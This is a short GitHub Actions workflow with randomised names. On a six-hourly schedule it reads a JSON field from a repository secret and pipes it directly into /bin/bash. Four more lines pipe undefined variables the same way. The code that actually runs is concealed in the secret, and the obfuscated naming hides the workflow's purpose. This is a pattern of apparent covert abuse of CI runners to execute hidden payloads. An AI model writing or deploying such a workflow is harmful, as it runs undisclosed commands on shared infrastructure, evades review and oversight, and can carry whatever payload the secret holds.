name: spritehire

on:
  workflow_dispatch:
  schedule:
    - cron: '56 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: spritehire
        env:
          sfwhe5: ${{ secrets.sfwhe5 }}
        run: |
          echo $sfwhe5 | jq -r .lh779 | /bin/bash
          echo $aqxwp687 | jq -r .quhl2 | /bin/bash
          echo $fs9 | jq -r .umqqx28896 | /bin/bash
          echo $w2325 | jq -r .gshc16 | /bin/bash
          echo $ypf138 | jq -r .dqe2157 | /bin/bash

